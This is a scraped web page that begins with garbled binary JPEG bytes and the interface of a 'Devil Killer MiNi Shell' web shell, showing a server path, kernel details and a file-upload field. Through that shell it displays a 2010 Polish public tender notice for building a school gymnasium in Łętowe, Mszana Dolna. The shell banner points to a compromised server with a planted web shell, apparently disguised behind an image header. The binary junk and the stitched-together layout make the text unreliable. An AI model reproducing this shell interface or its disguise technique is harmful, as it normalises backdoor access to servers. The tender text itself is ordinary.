JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100514/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100514/131820-N-2010.html

<p class="kh_header"><b>Mszana Dolna: Budowa sali gimnastycznej przy szkole podstawowej w Łętowem wraz z infrastrukturą zewnętrzną</b><br>
<b>Numer ogłoszenia: 131820 - 2010; data zamieszczenia: 14.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wójt Gminy , ul. Spadochroniarzy 6, 34-730 Mszana Dolna, woj. małopolskie, tel. 018 3310009 w. 615, 3319815, faks 018 3311242.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mszana.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa sali gimnastycznej przy szkole podstawowej w Łętowem wraz z infrastrukturą zewnętrzną.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem wykonania są roboty budowlane obejmujące budowę sali gimnastycznej przy szkole podstawowej wraz z zagospodarowaniem terenu w miejscowości Łętowe, gmina Mszana Dolna na działkach 616, 617. i obejmuje wykonanie:
-  Budowę budynku sali gimnastycznej z zapleczem i przewiązką wraz z instalacjami wewnętrznymi: sanitarnymi (wod.-kan. ,  c.o., wentylacji, gazowymi)i elektrycznymi 
-  Remont pomieszczeń szkoły, rozbiórka schodów zewnętrznych 
- Budowę zjazdu z drogi publicznej 
-  Budowę utwardzeń powierzchni gruntu wraz z miejscami postojowymi, drogą wewnętrzną i ciągami pieszymi
-  Budowę boiska sportowego szkolnego wraz z wyposażeniem
-  Budowę placu zabaw z elementami małej architektury - huśtawka, piaskownica, zestaw gimnastyczny, ławki, kosze na śmieci, 
-  Rozbiórkę i przebudowę ogrodzenia
-  Budowę przyłącza kanalizacji sanitarnej do budynku sali
-  Budowę kanalizacji opadowej i drenażu 
- Rozbiórkę gazociągu i przyłącza gazu i budowa w zmienionej trasie
-  Rozbiórkę kabla energetycznego i budowa w zmienionej trasie
-  Rozbiórkę linii napowietrznej nn i budowa w zmienionej trasie, budowa słupa
-  Rozbiórkę istniejącego budynku sklepu wraz z instalacjami wewnętrznymi i przyłączami .
2. Zakres robót podlegających trybowi przetargowemu musi być wykonany w sposób zgodny z powszechnie obowiązującymi warunkami technicznymi wykonania i odbioru robót budowlanych, dla tego typu obiektów, łącznie z robotami towarzyszącymi.

3. Szczegółowy zakres robót określa projekt budowlany i specyfikacja techniczna wykonania i odbioru robót budowlanych, które to dokumenty są załącznikami do specyfikacji istotnych warunków zamówienia. 
 
4. Załączone do specyfikacji kosztorysy w zakresie poszczególnych branż nie stanowią elementu dokumentacji projektowej. Mają charakter informacyjny. Wykonawca jest zobowiązany do dokonania własnych ustaleń co do rzeczywistego zakresu robót wymaganego do osiągnięcia zamierzonego rezultatu przewidzianego w projekcie. 

   WARUNKI SZCZEGÓŁOWE DOTYCZĄCE PRZEDMIOTU ZAMÓWIENIA

1.Przy wykonywaniu robót budowlanych należy bezwzględnie przestrzegać wymagań zawartych w      
dokumentacji technicznej, a materiały użyte do wykonania robót budowlanych winny spełniać normy i parametry techniczne określone w dokumentacji, opisane w SST oraz przedmiarze robót.

2. Wszelkie użyte w dokumentacji projektowej jak i w innych dokumentach nazwy produktów oraz firm mają wyłącznie zastosowanie do określenia parametrów technicznych i jakościowych urządzeń i materiałów wymaganych przez Zamawiającego  do realizacji zadania.  W takich przypadkach dopuszczalne jest zaoferowanie produktów równoważnych z tym, że wykonawca  wykaże, że oferowane produkty posiadają parametry techniczne i jakościowe co najmniej takie same jak produkty wymienione w projekcie. Ciężar wykazania równoważności spoczywa na Wykonawcy, a w oparciu o przedstawione przez niego dokumenty podlega weryfikacji przez Zamawiającego w konsultacji z projektantem i inspektorem nadzoru przed przystąpieniem do realizacji  przedmiotu zamówienia.
 
4. Wykonawca zobowiązany jest umieścić tablice informacyjne i ostrzegawcze w miejscu prowadzenia robót, oraz właściwie zabezpieczyć i oznakować teren budowy.

5. Wykonawca ponosi całkowitą odpowiedzialność za szkody powstałe i wynikłe na terenie budowy, od daty protokolarnego przejęcia placu budowy przez Wykonawcę, do daty protokolarnego oddania budowy (odbioru końcowego robót) - szkody związane z uszkodzeniem i zabrudzeniem terenów przyległych.

6. Zamawiający wymaga udzielenia minimum 60 miesięcznej gwarancji  na wykonany przedmiot zamówienia - roboty budowlane i instalacyjne oraz zamontowane urządzenia - od daty protokolarnego odbioru pełnego zakresu robót. Na potwierdzenie spełnienia powyższego wymogu, Wykonawca składa w ofercie oświadczenie o czasie udzielonej gwarancji na wykonane roboty budowlane i instalacyjne oraz zamontowane urządzenia. 

7. Wymaga się aby zgłoszony przez Wykonawcę kierownik budowy był obecny na budowie w trakcie wykonywania robót.

8. Wykonawca skalkuluje w cenie ofertowej i bez dodatkowego wynagrodzenia zobowiązuje się  do wykonania następujących prac:
1)kompleksowa obsługa geodezyjna inwestycji, w tym w szczególności: naniesienie reperów roboczych, tyczenie, inwentaryzacja  powykonawcza. wraz z 3 egz. inwentaryzacji powykonawczej zadania:
- pomiary inwentaryzacyjne winny objąć poza przedmiotem zamówienia także inne sieci uzbrojenia terenu znajdujące się w odkrywce , które są niezgodne z lokalizacją uwidocznioną na mapach zasadniczych zgodnie z Rozporządzeniem Ministra Rozwoju Regionalnego i Budownictwa z dnia 02.04.2001r. w sprawie geodezyjnej ewidencji sieci uzbrojenia terenu oraz zespołów uzgadniających dokumentacji projektowych 
- inwentaryzacja zarejestrowana w PODGiK opracowana w formie papierowej 
2)projekt organizacji ruchu wraz z koniecznymi uzgodnieniami
3)obsługa geologiczna:
- odbiory podłoża pod posadowienie obiektów  oraz inne czynności wynikłe w trakcie realizacji robót a wymagające opinii czy też czynności geologa.
4)uzyskanie stosownych decyzji wraz z opłatami oraz wykonanie tych decyzji na koszt wykonawcy, w tym m.in. 
- zajęcie pasa drogowego
- związanych z realizacją robót w pobliżu urządzeń wymagających stosownych decyzji
- innych - niezbędnych przy realizacji zadania
5)W razie konieczności uzyskanie opracowania projektów zamiennych, uzupełniających wraz z uzyskaniem dla tych projektów pozwoleń na budowę 
6)organizacja i zabezpieczenie placu budowy
7)Wykonanie niezbędnych badań, prób i pomiarów oraz  badań, prób i pomiarów na polecenie inspektorów nadzoru w celu stwierdzenia prawidłowości wykonanych robót.
8)dokonania odkrywek w przypadku nie zgłoszenia do odbioru robót ulegających zakryciu lub zanikających,
9)uporządkowanie terenu i przywrócenie do stanu pierwotnego (odtworzenie wszystkich obiektów , które ewentualnie muszą ulec rozebraniu w trakcie realizacji zadania) .
10)bieżące usuwanie, składowanie i ewentualna utylizacja materiałów rozbiórkowych i powstałych odpadów,
11)przygotowanie dokumentacji do odbioru częściowego i przygotowanie kompletu dokumentów niezbędnych do uzyskania pozwolenia na użytkowanie dla całości  inwestycji .
12)likwidacja placu budowy
13)oraz wszelkie inne prace nie objęte w SIWZ , a konieczne do wykonania ze względu na sztukę budowlaną oraz obowiązujące normy i przepisy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.21.22.22-8, 45.21.22.00-8, 45.11.13.00-1, 45.11.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zasady wnoszenia wadium
Wadium  w wysokości 35.000,00 zł (słownie: trzydzieści pięć tysięcy złotych ) powinno być wniesione w terminie do dnia 31 maja 2010 r. do godz. 11:00

Nie wniesienie wadium w wymaganym terminie spowoduje wykluczenie wykonawcy z postępowania, zgodnie z  Ustawą Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełnienia tego warunku na podstawie analizy treści oświadczenia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadania wiedzy i doświadczenia
Przedmiotowy warunek zostanie uznany za spełniony, jeżeli wykonawca wykaże się nie mniej niż:
2 robotami budowlanymi w zakresie budowy Sali gimnastycznej wraz z infrastrukturą zewnętrzną  o wartości co najmniej  2. 700 000,00 zł brutto dla każdej z nich.

Ocena tego warunku będzie dokonana na podstawie:
- wykazu robót budowlanych wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone 
- Do każdej pozycji wyszczególnionej w wyżej wymienionym wykazie należy załączyć dokument potwierdzający  że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.

Z przedłożonych referencji ma jednoznacznie wynikać: rodzaj prac wraz z ich wartością, kto był stroną zamawiającą, kto wystawił referencje, data ich wystawienia, wartość wykonanych prac oraz stwierdzenie, że prace zostały wykonane zgodnie ze sztuką budowlaną i prawidłowo ukończone.
Zamawiający zastrzega sobie, że protokół odbioru robót może być załącznikiem uszczegóławiającym zakres robót wymienionych w referencji, ale nie może stanowić samodzielnego dokumentu potwierdzającego wykonanie robót.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotowy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże się dysponowaniem:
 osobami zdolnymi do wykonania Zamówienia odrębnie:
- kierownikiem robót posiadającym uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno- budowlanej z minimum 8-letnim doświadczeniem zawodowym jako kierownik budowy a ponadto jest członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą o samorządach zawodowych;
- kierownikiem budowy posiadającym uprawnienia budowlane bez ograniczeń w specjalności instalacyjnej w zakresie sieci, wodociągowych i kanalizacyjnych, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych z minimum 5-letnim doświadczeniem zawodowym jako kierownik budowy a ponadto jest członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą o samorządach zawodowych;
- kierownikiem robót posiadającym uprawnienia budowlane bez ograniczeń w specjalności drogi i ulice z min. 5-letnim doświadczeniem zawodowym jako kierownik budowy a ponadto jest członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą o samorządach zawodowych;
- kierownikiem robót posiadającym uprawnienia budowlane  bez ograniczeń w specjalności  instalacyjnej w zakresie instalacji i urządzeń elektrycznych i elektroenergetycznych z minimum 5-letnim doświadczeniem zawodowym jako kierownik budowy a ponadto jest członkiem właściwej izby samorządu zawodowego, zgodnie z ustawą o samorządach zawodowych;

- kadra kierownicza w każdym przypadku powinna posiadać aktualny wpis do właściwej izby samorządu zawodowego (Dz. U. nr 5/2001, poz. 42),

 Ocena tego warunku będzie dokonana w oparciu o:
- wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia, niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie dysponowania tymi osobami (wykaz wykonywanych przez pracowników prac musi odpowiadać zakresowi zamówienia) - załącznik  do SIWZ,
- oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia 

3) Jeżeli wykonawca (niezależnie od charakteru prawnego łączących stosunków z innymi podmiotami) polega na zasobach innych podmiotów  -  osobach zdolnych do wykonania zamówienia, zobowiązany jest udowodnić zamawiającemu , iż będzie dysponował  tymi zasobami. Przedstawia w tym celu pisemne zobowiązanie tego lub tych podmiotów do oddania mu do dyspozycji osób z uprawnieniami i doświadczeniem jak wskazano wyżej, na okres korzystania z tych zasobów przy wykonywaniu przedmiotowego zamówienia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Przedmiotowy warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże:
- że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę nie mniejszą niż 2.000 000,00 zł
- wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wysokości 1 500 000,00 zł

Ocena tego warunku zostanie dokonania w oparciu o:
- opłaconą polisę a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności, związanej z przedmiotem zamówienia
- informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Jeżeli wykonawca, wykazując spełnianie warunku, o którym mowa w art. 22 ust. 1 pkt 4 ustawy, polega na zdolnościach finansowych innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy, wymaga się przedłożenia ww. informacji z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącej tych podmiotów.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>dowód wniesienia wadium,
w przypadku Wykonawców wspólnie ubiegających się o zamówienie, pełnomocnictwo do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania ich w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.

W przypadku podpisywania oferty lub poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę, osoby nie wymienione w dokumencie rejestracyjnym wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo. 
Pełnomocnictwo powinno być przedłożone w formie oryginału lub notarialnie potwierdzonej kopii.
W przypadku wnoszenia wspólnej oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia, należy dołączyć oświadczenie Wykonawców, że ich zobowiązania co do wykonania zamówienia są solidarne a także: oświadczenia i dokumenty potwierdzające spełnienie warunków udziału w postępowaniu .</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
